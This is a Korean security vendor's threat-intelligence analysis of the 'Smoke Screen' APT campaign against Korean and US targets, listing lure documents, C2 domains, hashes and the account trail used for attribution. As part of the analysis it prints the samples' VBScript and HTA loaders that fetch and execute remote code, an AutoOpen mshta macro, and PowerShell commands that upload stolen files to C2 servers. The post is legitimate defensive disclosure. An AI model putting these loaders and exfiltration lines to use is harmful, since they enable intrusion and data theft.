본문 바로가기

공지사항

이스트시큐리티 소식을 알려드립니다.

한ㆍ미 겨냥 APT 캠페인 '스모크 스크린(Smoke Screen)' 실체 분석

보안공지 2019-04-17


ESRC에서는 한국의 대북관련 분야에 종사하는 인물을 대상으로 4월 11일 기준 스피어 피싱(Spear Phishing) 공격이 수행된 것을 발견했습니다.


이는 지난 04월 03일 【최근 한반도 관련 주요국 동향】, 【3.17 미국의 편타곤 비밀 국가안보회의】 내용으로 전파된 '스텔스 파워(Operation Stealth Power)' 작전의 APT 공격 연장 활동으로 드러났으며, 2014년 한국수력원자력(한수원) 해킹 공격 배후와 동일 조직으로 밝혀졌습니다.


[English Version]

Analysis of the APT Campaign ‘Smoke Screen’ targeting to Korea and US

 Smoke Screen.pdf


[그림 1] 한미정상회담 관련 정부 관계자 발언 내용으로 사칭한 공격 사진


공격자는 '한미정상회담 관련 정부 관계자 발언' 제목으로 수신자를 현혹하고 있으며, '한미정상회담 관련 정부 관계자 발언.hwp' 이름의 악성 파일이 첨부되어 있습니다.


hwp 악성 문서 파일은 암호화된 상태로 유포되었으며, 암호를 입력하지 않을 경우 EPS 취약점이 작동하지 않게 됩니다.


문서 파일 취약점이 작동하게 되면, 한국의 특정 명령제어(C2) 서버와 통신을 시도하고 'first.hta' 파일을 로드합니다. 그리고 HTML 응용 프로그램 호스트 내부에 포함되어 있는 VBScript 코드가 실행됩니다.


Set Post0 = CreateObject("MSXML2.ServerXMLHTTP.6.0"):

Post0.open "GET", "http://naban.co[.]kr/mobile/skin/member/ctml/v/expres.php?op=1", False:

Post0.Send:

t0=Post0.responseText:

Execute(t0)


악성 스크립트 코드는 아래와 같은 스테이지 1~3 과정을 거치고, 파워쉘 기반 키로거를 실행해, 감염된 컴퓨터의 정보를 은밀히 수집해 유출하게 만듭니다. 그리고 레지스트리에 등록해 C2 통신만으로 스파이 기능을 수행하게 됩니다.


- http://naban.co[.]kr/mobile/skin/member/ctml/v/first.hta

- http://naban.co[.]kr/mobile/skin/member/ctml/v/expres.php?op=1

- http://naban.co[.]kr/mobile/skin/member/ctml/v/upload.php


- http://naban.co[.]kr/mobile/skin/member/ctml/v/Second.hta

- http://naban.co[.]kr/mobile/skin/member/ctml/v/expres.php?op=2

- http://naban.co[.]kr/mobile/skin/member/ctml/v/upload.php

- http://naban.co[.]kr/mobile/skin/member/ctml/v/keylogger1.ps1 -> ktmp.log



참고로 그동안 공격에 사용된 서버들은 한국의 특정 서버의 아이피로 연결되는 공통 특징이 존재합니다.


- naban.co[.]kr (110.4.107[.]244)

- jmable.mireene[.]com (110.4.107[.]244)

- itoassn.mireene[.]co.kr (110.4.107[.]244)

- jmdesign.mireene[.]com (110.4.107[.]244)



악성 HWP 문서가 실행되면, '한미정상회담 관련 정부 관계자 발언(20190409)' 제목과 내용 등이 포함되어 있습니다. 그리고 해당 문서는 기존 '스텔스 파워' 작전과 동일한 'Tom' 계정으로 등록되어 있습니다.


[그림 1-1] 악성 HWP 실행된 후 보여지는 화면과 'Tom' 계정


한편, 지난 2019년 04월 01일 오후 05시 15분(KST)에 만들어진 'TaskForceReport.doc' 이름의 악성 문서 파일이 해외에서도 관찰되었습니다.


ESRC에서는 이 악성 DOC 문서 파일이 최근 한국 및 미국 등지에서 발생한 특정 침해사고와 연계되는 정황을 포착했고, 해당 위협 조직이 국내외 맞춤형 표적공격에 적극 가담하고 있을 것으로 풀이됩니다.


흥미로운 점은 이 APT 공격에 사용된 악성 코드 시리즈가 한국에서 발견된 '수키(Kimsuky) 조직, 스텔스 파워(Operation Stealth Power) 침묵 작전' (2019-04-30)과 베이비 캠페인 시리즈인 거대 위협으로 다가온, 특명 '자이언트 베이비(Operation Giant Baby)' (2019-03-28) 등과 직ㆍ간접적으로 연결된다는 점입니다.


지난 3월 말부터 4월 초까지 한국에서 발견된 악성 HWP 문서파일들은 모두 동일한 취약점 공격 기법이 활용되었으며, 문서파일을 작성한 계정명도 'Tom'으로 일치하고 있습니다.


[그림 1-2] HWP 악성 문서 파일 메타데이터 화면



■ 위장전술과 연막작전의 귀재, '캠페인 스모크 스크린' 배경


'TaskForceReport.doc' 악성 파일은 해외에서 먼저 보고 되었지만, 문서 자체는 한국어 기반으로 제작 되었으며, 유사한 변종 형태가 다수 존재합니다.


악성 파일 제작자는 'windowsmb', 'JamFedura', 'Aji', 'DefaultAcount', 'yeri', 'Roberts Brad' 등의 독특한 윈도우즈 계정 등을 사용하였고, 비트코인 등을 거래하거나 사행성 도박게임, 암호화폐 관련 프로그램 개발에 참여하고 있는 것도 확인되었습니다.


일부 계정의 경우 한국의 카카오 톡(Kakao Talk)에도 등록되어 있으며, 텔레그램(Telegram), 스카이프(Skype) 등의 메신저 서비스를 이용하고 있습니다.


ESRC에서는 종합적 판단을 통해 이번 APT 공격 배후에 '특정 정부의 후원을 받는 조직(state-sponsored actor)'이 있다고 믿고 있으며, 이들이 한국어, 영어 등을 자유자재로 구사하며, 외국인 가짜 프로필 사진으로 변장해 은밀히 활동하는 점을 착안해 '캠페인 스모크 스크린(Campaign Smoke Screen)'으로 명명했습니다.


2014년 한수원 해킹 배후로 분류된 해당 위협조직이 한국과 미국 등의 APT 공격에도 가담하며, 한국에서는 HWP 문서파일 취약점을 이용하고, 해외에서는 DOC 문서파일 취약점을 활용해 맞춤형 표적공격을 수행하는 것이 드러났습니다.



■ DOC기반 APT 공격 전략 전술 및 위협 벡터 분석


2019년 04월 01일 제작된 'TaskForceReport.doc' (MD5 : d400adcd06e0a07549e2465c9c500c45) 악성 문서파일은 아래 주소를 통해 유포되었습니다.


- tdalpacafarm[.]com/wp-includes/Text/Diff/common/doc.php


그런데 이 서버는 이미 'Oct_Bld_full_view.docm' (MD5 : 1a6f9190e7c53cd4e9ca4532547131af) 악성 문서가 C2로 사용된 바 있고, Palo Alto Networks Unit 42 팀에서 'New BabyShark Malware Targets U.S. National Security Think Tanks' 제목으로 보고한 바 있습니다.


당시에 사용된 VBA 코드는 다음과 같습니다.

    

Sub change_words(ByVal findWord, ByVal replaceWord)


   With Selection.Find

        .Text = findWord

        .Replacement.Text = replaceWord

        .Forward = True

        .Wrap = wdFindContinue

        .MatchWholeWord = True

   End With

   Selection.Find.Execute Replace:=wdReplaceAll

End Sub


Sub AutoOpen()

    Shell ("mshta https://tdalpacafarm[.]com/files/kr/contents/Vkggy0.hta")

End Sub


위의 코드에서 'Vkggy0.hta' 코드가 정상적으로 로딩되면, 내부에 존재하는 VBScript 명령에 의해 HTTP GET 응답을 받고 추가적인 파워쉘 명령들이 연이어 실행되어집니다.


이번에 발견된 악성 문서 파일 역시 동일한 시퀀스 흐름을 가지고 있습니다.


먼저 악성 문서 파일이 실행되면 액티브 콘텐츠 실행되지 않도록 보안경고 메시지가 보여지는데, 이때 마치 낮은 MS 오피스 버전 사용으로 인해 내용이 보여지지 않는 것처럼 현혹해 [콘텐츠 사용] 버튼을 클릭하도록 유도합니다.


[그림 2] 한국어 기반으로 작성된 악성 문서가 실행된 후 보여지는 화면


악성 문서 내부에는 'activeX1.bin' 부터 'activeX10.bin' 파일이 포함되어 있고, 그 중 'activeX2.bin' 파일에 다음과 같이 통신 호스트 주소가 포함되어 있으며, HTA 명령과 조건에 의해 추가적인 C2로 통신을 시도하게 됩니다.


- https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/Htqgf0.hta

- https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/expres.php?op=1

- https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/cow.php?op=exe.gif

- https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/cow.php?op=cow.gif


[그림 3] 'activeX2.bin' 파일 내부 코드 화면


'TaskForceReport.doc' (MD5 : 0f77143ce98d0b9f69c802789e3b1713) 파일과 동일한 이름으로 유포된 다른 변종 중에는 지난 3월에 유포된 이력이 존재합니다.


- https://christinadudley[.]com/public_html/includes/common/Qfnaq0.hta

- https://christinadudley[.]com/public_html/includes/common/expres.php?op=1

- https://christinadudley[.]com/public_html/includes/common/cow.php?op=Normal.src

- https://christinadudley[.]com/public_html/includes/common/Normal.src

- https://christinadudley[.]com/public_html/includes/common/cow.php?op=exe.gif

- https://christinadudley[.]com/public_html/includes/common/cow.php?op=cow.gif


이때 사용된 C2 도메인은 christinadudley[.]com 사이트가 사용되었습니다.


'Qfnaq0.hta' 파일은 다음과 같은 스크립트 코드를 포함하고 있으며, 디코딩 키와 루틴을 통해 'expres.php?op=1' 코드를 로딩하게 됩니다.


<html><script language="VBScript">On Error Resume Next:Function Co00(c):L=Len(c):s="":For jx=0 To d-1:For ix=0 To Int(L/d)-1:s=s&Mid(c,ix*d+jx+1,1):Next:Next:s=s&Right(c,L-Int(L/d)*d):Co00=s:End Function:Set Post0 = CreateObject("MSXML2.ServerXMLHTTP.6.0"):Post0.open "GET", "https://christinadudley[.]com/public_html/includes/common/expres.php?op=1", False:Post0.Send:t0=Post0.responseText:d=7:t0=Co00(t0):Execute(t0):window.close()</script></html>


당시 최종적으로 유포된 'exe.gif' 파일은 BASE64 코드로 인코딩되어 있는 상태이며, 디코딩을 거치면, 32비트 EXE 형식의 악성코드로 변환됩니다.


[그림 4] BASE64 코드로 인코딩된 파일이 올려진 화면


디코딩된 EXE 파일은 EGIS Co, Ltd, 디지털 서명이 포함되어 있는데, 이 서명은 과거 한국의 여려 침해사고에서 악용된 바 있습니다.


[그림 5] EGIS Co., Ltd. 디지털 서명 화면


DOC 공격벡터에 사용된 HTA 스크립트를 살펴보면 보면 지난 3월 31일과 4월 1일 한국에서 발생했던 HWP 악성 문서 기반의 '스텔스 파워(Operation Stealth Power)' 위협 사례와 이번 '스모크 스크린(Campaign Smoke Screen)' 스크립트 형식이 유사하다는 것을 알 수 있습니다.


그리고 HWP 악성 문서로 설치된 파워쉘 기반 키로깅 기능의 함수(function Start-KeyLogger)도 DOC 악성문서 시리즈와 동일하게 사용되었습니다.


위협 조직이 한국 대상 APT공격에서는 HWP 문서 취약점을 사용하고, 해외를 대상으로 삼을 때는 악성 DOC 문서를 활용한 특징이 존재합니다. 


[그림 6] 한국과 해외에서 발견된 악성 스크립트 비교 화면


특히, C2 서버와 통신할 때 사용되는 'expres.php?op=1', 'cow.php?op=1" 파일명과 파라미터 뿐만 아니라, 파워쉘이 사용하는 함수 스타일도 매우 유사한 것을 알 수 있습니다.


또한, 정보 유출에 사용된 'upload.php' 파일명이 오버랩되며, HWP 취약점이 사용된 C2서버는 한국, DOC 취약점이 쓰인 C2는 중간에 'kr' 하위주소가 포함되어 있습니다.


 ● HWP

 retu=wShell.run("cmd.exe /c powershell.exe (New-Object System.Net.WebClient).UploadFile

('http://jmable.mireene[.]com/shop/price/com/upload.php','"&amp;ttmp0&amp;"');del 

"""&amp;ttmp0&amp;""";del """&amp;ttmp&amp;"""",0,true)


 ● DOC

 retu=wShell.run(“powershell.exe (New-Object System.Net.WebClient).UploadFile

(‘https://tdalpacafarm[.]com/files/kr/contents/upload.php’,'”&ttmp1&”‘);del 

“””&ttmp1&”””;del “””&ttmp&””””,0,true)


그리고 'VBAWarnings' 레지스트리 키 등록 부분과 'ttmp.log' 로그 파일명 등도 정확히 일치되는 것을 확인했습니다.


ESRC는 여러 정황상 단순 우연의 일치일 가능성은 희박해 보이고, 서버사이드 기반의 공격 환경까지 유사하게 사용한 것으로 보아, 한국에서 발견된 HWP 악성문서와 해외에서 보고된 DOC 악성문서가 동일한 위협조직에 의해 수행된 APT 공격으로 믿고 있습니다.


[그림 7] 'VBAWarnings' 레지스트리키와 'ttmp.log' 파일 생성 화면


악성 DOC 문서파일은 기본적으로 한국어 기반으로 설정되어 있는 특징을 가지고 있습니다.


[그림 8] 한국어 기반으로 설정된 악성 문서 파일



■ 유사 위협 케이스 비교 및 침해지표(IoC) 자료


hta 파일을 이용한 공격은 다양한 사례들이 발견되고 있는데, 특히 '(seoulhobi[.]biz / 192.186.142[.]74)' C2를 이용한 경우가 다수 포착되었습니다.


'AltcoinMiningBot.exe' (MD5 : cf264f9bca2f2fbcc2c1e7a4a491afec) 악성코드의 경우는 알트코인 마이닝 봇 프로그램처럼 위장해 유포되었고, '192.186.142[.]74' 호스트로 명령을 주고 받습니다.


- http://seoulhobi[.]biz/how/fmaov0.hta


- http://192.186.142[.]74/cache/fwvuj0.hta

- http://192.186.142[.]74/cache/expres.php?op=1

- http://192.186.142[.]74/cache/expres.php?op=2

- http://192.186.142[.]74/cache/cow.php?op=exe.gif

- http://192.186.142[.]74/cache/cow.php?op=cow.gif

- http://192.186.142[.]74/cache/upload.php


- http://192.186.142[.]74/mn/xtgnb0.hta


- http://192.186.142[.]74/post/Yluhi0.hta


- http://192.186.142[.]74/dll/Mylqn0.hta


- http://192.186.142[.]74/lib/szgfj0.hta

- http://192.186.142[.]74/lib/expres.php?op=1


- https://login-main.bigwnet[.]com/attachment/view/note.php

- https://login-main.bigwnet[.]com/attachment/view/Msgxo0.hta

- https://login-main.bigwnet[.]com/attachment/view/expres.php?op=1

- https://login-main.bigwnet[.]com/attachment/view/cow.php?op=Normal.src

- https://login-main.bigwnet[.]com/attachment/view/Msgxo.hta

- https://login-main.bigwnet[.]com/attachment/view/expres.php?op=2


- https://mohanimpex[.]com/include/tempdoc/891250/doc.php

- https://mohanimpex[.]com/include/tempdoc/891250/Ersrr0.hta

- https://mohanimpex[.]com/include/tempdoc/891250/expres.php?op=1

- https://mohanimpex[.]com/include/tempdoc/891250/Pkjjy.hta

- https://mohanimpex[.]com/include/tempdoc/891250/upload.php

- https://mohanimpex[.]com/include/tempdoc/891250/image.png


- https://fmchr[.]in/images/common/NEACD/Qzqrn0.hta

- https://fmchr[.]in/images/common/NEACD/expres.php?op=1

- https://fmchr[.]in/images/common/NEACD/upload.php

- https://fmchr[.]in/images/common/NEACD/cow.php?op=1


192.186.142[.]74 주소로 명령을 주고 받는 악성파일은 몇 종류가 더 발견되었습니다.


- 'update.exe' (MD5 : b74909e14e25d2e9d1452b77f9927bf6)

- 'explorer.tmp' (MD5 : 599ef2988141d251c3f4ce991a9b5cd2)



'explorer.tmp' 악성 파일의 경우에는 '카우보이(cowboy)' 문자를 사용하기도 하는데, 'cow.php?op=cow.gif' 명령을 사용할 때도 'cowboy' 이름을 사용했습니다.


[그림 9] 악성코드 내부에 cowboy 스트링이 포함된 화면


2019년 02월~04월까지 제작된 변종들을 시간대 계정별로 정리하면 다음과 같습니다.


 File Name 

 Task_Force_report.doc

 Last Modified Date (KST)

 2019-03-05 18:17

 Last Modified Name

 windowsmb

 C2

 https://christinadudley[.]com/public_html/includes/common/Qfnaq.hta

 MD5

 e68b11bef48e8e88cba7e3c93fac5eab



 File Name 

 Task_Force_report.doc

 Last Modified Date (KST)

 2019-03-05 18:18

 Last Modified Name

 windowsmb

 C2

 https://christinadudley[.]com/public_html/includes/common/Qfnaq.hta

 MD5

 0f77143ce98d0b9f69c802789e3b1713



 File Name 

 Speaking notes-ExMon Deterrence Summit-24Mar-rev26Mar19.doc

 Last Modified Date (KST)

 2019-03-21 17:42

 Last Modified Name

 windowsmb

 C2

 https://login-main.bigwnet[.]com/attachment/view/Msgxo0.hta

 MD5

 7ca1a603a7440f1031c666afbe44afc8



 File Name 

 Speaking notes-ExMon Deterrence Summit-24Mar-rev26Mar19.doc

 Last Modified Date (KST)

 2019-03-26 09:45

 Last Modified Name

 windowsmb

 C2

 n/a

 MD5

 60973af3b8ecbbb0ab659124409b7df1



 File Name 

 Speaking notes-ExMon Deterrence Summit-24Mar-rev26Mar19.doc

 Last Modified Date (KST)

 2019-03-27 10:06

 Last Modified Name

 windowsmb

 C2

 n/a

 MD5

 2ff911b042e5d94dd78f744109851326



 File Name 

 TaskForceReport.doc

 Last Modified Date (KST)

 2019-04-01 17:15

 Last Modified Name

 windowsmb

 C2

 https://tdalpacafarm[.]com//wp-includes/Text/Diff/common/Htqgf0.hta

 MD5

 d400adcd06e0a07549e2465c9c500c45


2019년 03월~4월까지는 'windowsmb' 계정명으로 제작된 문서파일들이 발견되었습니다만, 02월에서는  'JamFedura', 'Aji' 계정명이 사용되었습니다.


'Speaking notes-ExMon Deterrence Summit-24Mar-rev26Mar19.doc' 파일의 경우는 정상 파일형태와 악성 파일 형태가 다양하게 발견이 되었습니다.


공격자는 'John Harvey' 이름으로 작성된 문서를 악성으로 활용한 정황이 식별되었습니다.


[그림 9-1] 'John Harvey' 정상 문서를 'windowsmb' 계정에서 수정된 화면


 File Name 

 OFT.docm

 Last Modified Date (KST)

 2019-02-14 23:08

 Last Modified Name

 JamFedura

 C2

 http://192.186.142[.]74/cache/Fwvuj0.hta

 MD5

 304d86463a1fff5183aacc17ef2b3730



 File Name 

 bot spec.docm

 Last Modified Date (KST)

 2019-02-18 17:30

 Last Modified Name

 JamFedura

 C2

 http://192.186.142[.]74/mn/Xtgnb0.hta

 MD5

 f816a9c4a3415e8bae807c09e0f80b38



 File Name 

 white_paper.doc

 Last Modified Date (KST)

 2019-02-19 17:29

 Last Modified Name

 Aji

 C2

 http://192.186.142[.]74/dll/Mylqn0.hta

 MD5

 4118b251c977a682ebb4993601b9a7e3



 File Name 

 Schedule_.doc

 Last Modified Date (KST)

 2019-02-22 17:09

 Last Modified Name

 JamFedura

 C2

 http://192.186.142[.]74/post/Yluhi0.hta

 MD5

 29fbf69e72c0daac57d2cbba11bbfaa5



 File Name 

 xCryptoCrash_Schedule.doc

 Last Modified Date (KST)

 2019-02-25 02:26

 Last Modified Name

 JamFedura

 C2

 http://192.186.142[.]74/post/Yluhi0.hta

 MD5

 397ba1d0601558dfe34cd5aafaedd18e



 File Name 

 white_paper.doc

 Last Modified Date (KST)

 2019-02-26 15:40

 Last Modified Name

 JamFedura

 C2

 http://www.seoulhobi[.]biz/how/Fmaov0.hta

 MD5

 49bac05068a79314e00c28b163889263


'white_paper.doc' 악성 문서파일의 경우 'Aji'로 등록된 경우와 'JamFedura' 계정으로 등록된 사례가 존재하는데, C2서버는  192.186.142[.]74 / seoulhobi[.]biz 도메인으로 동일하게 사용되었습니다.


그리고 'xCryptoCrash_Schedule.doc' 등 암호화폐 관련 미끼파일로 공격을 수행하기도 했습니다.



■ 휴먼 위협 인텔리전스 기반의 공격 배후 조사


ESRC에서는 seoulhobi[.]biz (192.186.142[.]74) 도메인의 등록자를 조사하는과정에서 공격자가 'snow8949@hotmail.com' 이메일을 사용해, MonoVM 호스팅을 활용하고 있다는 것을 확인했습니다.


참고로 동일하지는 않지만, 2018년 한국 침해사고에서 'snow+숫자' 조합의 이메일 아이디를 사용한 경우가 일부 보고된 바 있습니다. 


이들은 한국의 포털사와 유사하게 피싱용 도메인을 만들어 사용하는데, 등록정보에 국가를 일본으로 설정하고, 이름을 'Jane Jhone' 등으로 사용했습니다.


- http://nidhelpnaver[.]com


지금까지 기술한 내용들을 기반으로 위협 배후의 연결고리 중 일부를 공개하면 다음과 같습니다.


우선 지난 2월 경 공격자가 사용한 'JamFedura' 계정에 주목할 필요가 있습니다.


이 계정은 트위터(Twitter), 텔레그램(Telegram), 크립토랜서(Cryptolancer) 등 서로 다른 프로필 사진으로 유사한 계정이 등록된 것을 확인할 수 있습니다.


트위터 '@JFedura' 계정은 위치가 미국으로 설정되어 있으며 2017년 12월 가입했고, 자신의 소개란에 일부 영문 오타가 존재하지만, 【암호화폐 개발자】 등이 언급되어 있습니다.


그리고 암호화폐 분야 개발자를 프리랜서 형태로 연결해 주는 크립토랜서의 'jamfedura' 계정은 2019년 02월 가입했으며, 역시 자신을 【암호화폐 개발자】로 소개하고 있는데, 위치가 중국으로 설정되어 있습니다.


[그림 10] 트위터와 텔레그램, 크립토랜서 유사 계정 화면


트위터에 올려진 내용을 살펴보면, 주로 암호화폐 거래 관련 내용을 리트윗하거나 일부 계정으로 짧은 영어 트윗만 보낸 기록이 남아 있습니다.


한편, 한국의 프로그램 개발회사와 프리랜서 개발자를 이어주는 온라인 아웃소싱 플랫폼인 위시켓(Wishket) 사이트에서 트위터와 동일한 아이디와 프로필 사진으로 활동 중인 것으로 밝혀졌습니다.


더불어 2017년 08월에는 해외 비트코인 포럼에도 가입해 2018년 01월까지 활동한 이력도 포착되었습니다.


[그림 11] 비트코인 포럼과 위시켓에 등록된 포트폴리오 화면


위시켓의 자기소개란에는 8년간의 개발 경험을 가지고 있으며, 가상(암호)화폐 개발에 적극 참여하고 있다는 내용과 함께 '게임 사이트 개발', '가상 화폐 채굴 프로그램 개발', '가상 화폐 거래 사이트' 등의 포트폴리오가 등록되어 있습니다.


비트코인 포럼에는 여러가지 활동내용이 포함되어 있는데, 그 중에 사용 중인 이메일 주소가 'jamshine1993@hotmail.com' 발견되었고, 이 계정은 'om*****@hotmail.com 으로 연결되어 있습니다.


그리고 비트코인 지갑 주소(15vsH2T3ss9owzuaGnN7ee155tEwS4igFg) 공개되어 있는데, 특별한 거래내역은 확인되지 않았습니다.



[그림 12] 비트코인 포럼에 등록된 핫메일 주소와 연결된 계정


2018년 05월 공개된 Cisco Talos 팀의 'NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea' 분석자료와 연결되는 변종이 이번 스모크 스크린 캠페인과 강력히 연결되고 있습니다.


탈로스 팀은 'NavRAT' 유형을 'Group123'(aka Geumseong121, RedEyes) 조직 연계 가능성을 조심스럽게 의심한 바 있는데, ESRC는 해당 시리즈가 2014년 당시 한수원 공격에 사용된 HWP 취약점 쉘코드와 정확히 일치한다는 것을 검증했습니다.


더불어 스모크 스크린 공격거점으로 활용된 특정 아이피 대역과 전형적인 교란전술 등이 최근 오퍼레이션들과 오버랩되고 있다는 점을 근거로 면밀한 조사를 수행하고 있습니다.


다양한 자체 분석 데이터와 분류 기준에 따라 스모크 스크린 APT 캠페인의 배후에 '금성121(Geumseong121)' 조직 보다 한수원을 위협했던 조직이 연계된 것으로 믿고 있습니다.


다만, 두 조직간의 침해지표에 공통 고리가 존재했던 사례가 몇 차례 발견된 바 있어 상호 협력하거나 조직개편, 인력 체계 이동 가능성도 배제할 수는 없습니다.


ESRC는 스모크 스크린 배후를 조사하는 과정에서 'NavRAT' 시리즈로 명명된 악성파일 변종 중에 'jamshine1993@hotmail.com' 이메일 계정으로 통신을 시도한 사례를 발견했습니다.


통신에 사용된 아이디는 'tiger199392' 이며, 구글 업데이트 프로그램처럼 위장되어 있고, 'Jamshine1993@hotmail.com' 주소로 감염자 정보를 전송하게 됩니다.


[그림 13] 'jamshine1993@hotmail.com' 이메일과 통신하는 NavRAT 시리즈


이번 'NavRAT' 유형의 악성파일은 2016년 보고된 바 있는 이른바 '김수키(Kimsuky)' 시리즈의 HWP 취약점 코드(MD5 : c94e5da189bf166fc4a2670685a796a3)와 일부 유사한 계정(hni)이 포함된 것도 발견됐습니다.


[그림 14] NavRAT (상) 시리즈와 김수키 시리즈 HWP (하) 코드 비교화면


유사한 계정은 텔레그램에서도 발견이 되는데, 여기서 사용된 대표 프로필 사진은 2007년 영화 '로켓 사이언스(Rockert Science)'의 주연배우 '리스 톰슨(Reece Thompson)' 영화 장면을 무단 도용했습니다.


[그림 15] 영화 로켓 사이언스 주연배우 사진을 텔레그램 프로필로 도용


공격자가 이 영화를 알고 도용한 것인지, 무작위로 선정한 이미지인지는 아직 확실하진 않으며, 영화 중에 한국인 판사 내용이 일부 포함되어 있다고 알려져 있습니다.


트위터의 프로필 사진 역시 특정 헤어 모델 사이트에 올려져 있던 사진을 무단 도용해서 사용한 것이 확인되었습니다.


[그림 16] 핫헤어스타일 사이트에 올려져 있는 모델 사진 화면


ESRC에서는 텔레그램으로 사용된 'jamfedura0293' 계정이 한글로 운영되는 필리핀 비트코인 거래사이트 '비트 마닐라'에 2019년 01월 04일 가입한 것을 발견했고, 해당 거래 사이트에서는 한글명 '코인짱1985' 이름으로 활동하고 있습니다.


참고로 '비트 마닐라' 사이트는 '필고' 사이트와 공용으로 운영되고 있어 동일한 아이디가 사용됩니다.


[그림 17] 필리핀 비트코인 거래 사이트에서 활동하는 모습


'코인짱1985' 계정은 여러 사람들의 글에 텔레그램으로 연락을 유도하는 댓글을 등록해 은밀하게 거래를 진행하고 있습니다.


특히, 작년 12월 23일 올려진 1500 비트코인 판매관련 글에 2019년 01월 04일 23시 58분에 댓글을 올리기도 했습니다.


1500 비트코인이면 당시 시세로도 엄청나게 큰 금액이라는 것을 알 수 있습니다.


[그림 18] 필리핀 비트코인 거래 사이트 활동 모습


ESRC는 텔레그램과 동일한 프로필 사진을 사용하는 여러 계정들을 발견할 수 있었습니다. 흥미롭게도 악성코드가 사용했던 'tiger1993' 계정이 카카오톡에 'coinchange' 이름으로 등록된 것을 확인했습니다.


그런데 이 계정의 프로필 사진이 텔레그램 '@jamfedura0293' 이미지와 정확히 일치했습니다.


[그림 19] 카카오톡에 등록된 'tiger1993' 계정


서로 다른 사람이 한국의 카카오톡 메신저와 텔레그램에 동일한 프로필 사진으로 활동한다는 것은 우연의 일치라고 보기에는 현실적으로 어려워 보입니다.


그리고 이와 동일한 프로필 사진이 프로그램 개발자를 연결해 주는 '프리랜서' 사이트에서도 발견이 되었습니다.


[그림 20] 동일한 사진으로 프리랜서 사이트에 등록된 'aji9170' 화면


프리랜서 사이트에 등록된 'aji9170' 계정은 한국으로 등록되어 있고, 기존 사례와 동일하게 암호화폐 개발자 정보로 등록되어 있습니다.


'aji9170' 계정으로 등록된 사용자는 영어 및 한글로 다양한 프로젝트 참여글을 등록하였고, 국적을 한국으로 표기해 두었습니다.


https://www.freelancer.co.kr/projects/mobile-phone/develop-bustabit-game/


I put a lot of coins on the bustabit game.

erc20, shekel, xgox, ethereum,

I can show you my demo.

I want to discuss with you in detail.

thank you.


https://www.freelancer.co.kr/projects/php/javascript-expert-who-can-integrate/


Hello.

i have read your project carefully.

i can finish your project on time and pefect.

Let's discuss more detail on chat.

Thanks


https://www.freelancer.co.kr/projects/c-programming/hidden-vnc-with-back-connection/


Hello.

I have module what you want.

i wanna discuss about your detail requirement.

i have an exerienece about Virus and malware.

Thanks


https://www.freelancer.co.kr/projects/python/telagram-bitmex-bot/


I have already made many bots.

I can show you.

I can fulfill your request smoothly.

I want to discuss with you in detail.

Thank you.


https://www.freelancer.co.kr/projects/php/perfect-money-payment-gateway-18523359/


Hello

I have already made it.

I can do it.

Let's discuss on chatting in detail.

Thank you.

########################################################################


https://www.freelancer.co.kr/projects/c-programming/need-expert-18408762/


Hello

I master in c++,

I can do it.

Let's discuss on chatting.

Thank you.

###############################################


https://www.freelancer.co.kr/projects/linux/finish-linux-project-18498297/


Hello sir

I can do it for 1day.

Let's discuss on chatting.

Thank you.

###########

###############################


https://www.freelancer.co.kr/projects/software-architecture/lock-bitings/


Hello.

i can do your project successfully on time.

i am very interesting in your project.

Let's discuss more detail on chat.

Thanks.


https://www.freelancer.co.kr/projects/java/expert-coding/


I am a cryptographer.

I can fulfill your request well.

I want to discuss with you in detail.

thank you.

#################################################################


https://www.freelancer.co.kr/projects/software-architecture/online-game-18406869/


Hello,

I managed an online server.

I can protect your server from DoS attacks.

I want to discuss with you in detail,

Thank.


https://www.freelancer.co.kr/projects/software-architecture/lock-bitings/


Hello.

i can do your project successfully on time.

i am very interesting in your project.

Let's discuss more detail on chat.

Thanks.


https://www.freelancer.co.kr/projects/php/install-bitcoin-ethereum-full-node/


Hello,

I can do it perfectly.

Let's discuss on chatting.

Thank you.

##################################


[그림 21] 'aji9170' 계정으로 프로젝트 개발 요청글을 올린 화면


ESRC에서는 공격자가 사용하는 고유한 특성과 키워드를 기반으로 추적하던 중 이와 유사한 형태로 프리랜서 글을 올리는 계정을 발견했습니다.


[그림 22] 'aji199293' 계정으로 활동하는 프리랜서


'aji199293' 계정으로 등록된 이 사용자는 2019년 01월 15일에 가입되었으며, 국가는 미국으로 등록되어 있습니다.


그리고 프로필 및 자기소개에는 암호화폐 개발 경력과 스킬을 포함하고 있습니다.


흥미로운 점은 이 사람이 한국어로 글을 올리고 있었다는 점이며, 스카이프 계정으로 'live:rjh917'을 사용하고 있다는 것입니다.


[그림 23] 'aji199293' 아이디로 올려진 화면


이 계정에서 등록된 글들을 살펴보면 기존 'aji9170'과 매우 유사하다는 것을 알 수 있습니다.


https://www.freelancer.co.kr/projects/php/send-whatsapp-message/


Hello

I made many bots.

I can do it with c++.

Let's discuss on chatting.

Thank you.

#########################################


https://www.freelancer.co.kr/projects/php/crypto-trading-bot-tradingview-scrip/


Hello.

I have already created an automated bot that uses binance's api.

I can show it to you.

I want to discuss with you in detail.

Thank you.


https://www.freelancer.co.kr/projects/php/cryptocurrency-website-18560239/


Hello

I have done it.

I can show you my demo.

Let's discuss on chatting.

Thank you.

###########################################################################################


https://www.freelancer.co.kr/projects/php/blockchain-dice-game/


Hello.

i have developed such like this game

i am very interesting in your project

Please send me a message so that we can discuss more

Thanks


https://www.freelancer.co.kr/projects/php/fhg-please-read-request-before/


Hello.

I have already developed all the 11 things you need.

I will show you all my demos.

I want to discuss with you in detail.

Thank you.


https://www.freelancer.co.kr/projects/php/proxy-creator-18562916/


Hello

I have proxies.

I have developed them.

So Which site do you want?

Proxies does not work all site.

Let's discuss on chatting in detail.

Thank you.


https://www.freelancer.co.kr/projects/graphic-design/email-marketing-landing-page-development/


Hello

I have experience in email marketing.

I built many email sender servers.

I can fulfill your demands.

I want to discuss with you in detail.

Thank you.


[그림 24] 'aji9170', 'aji199293' 비교 화면


'aji199293' 계정은 국적이 미국으로 등록되어 있지만, 초기에는 다른 아이디로 활동하며, 국적은 한국으로 설정된 경우도 확인되었습니다.


그리고 사행성 온라인 게임 개발에 한글로 참여한 모습도 포착되었고, PDF Exploit 외주제작에 개발이 가능하다는 글을 등록하기도 했습니다.


악성 파일 제작까지도 참여한 증거가 포착된 것입니다.

 

